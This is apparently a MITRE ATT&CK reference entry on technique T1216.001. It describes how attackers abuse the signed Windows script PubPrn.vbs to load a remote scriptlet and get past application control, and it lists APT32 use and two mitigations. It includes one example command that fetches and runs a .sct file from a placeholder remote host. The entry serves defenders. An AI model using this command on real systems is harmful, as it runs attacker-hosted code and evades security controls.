T1216.001 PubPrn
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe
. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com
.
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites. To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
Item |
Value |
ID |
T1216.001 |
Sub-techniques |
T1216.001 |
Tactics |
TA0005 |
Platforms |
Windows |
Version |
2.0 |
Created |
03 February 2020 |
Last Modified |
18 April 2022 |
Procedure Examples
ID |
Name |
Description |
G0050 |
APT32 |
APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses. |
Mitigations
ID |
Mitigation |
Description |
M1040 |
Behavior Prevention on Endpoint |
On Windows 10, update Windows Defender Application Control policies to include rules that block the older, vulnerable versions of PubPrn. |
M1038 |
Execution Prevention |
Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries. |
Detection
References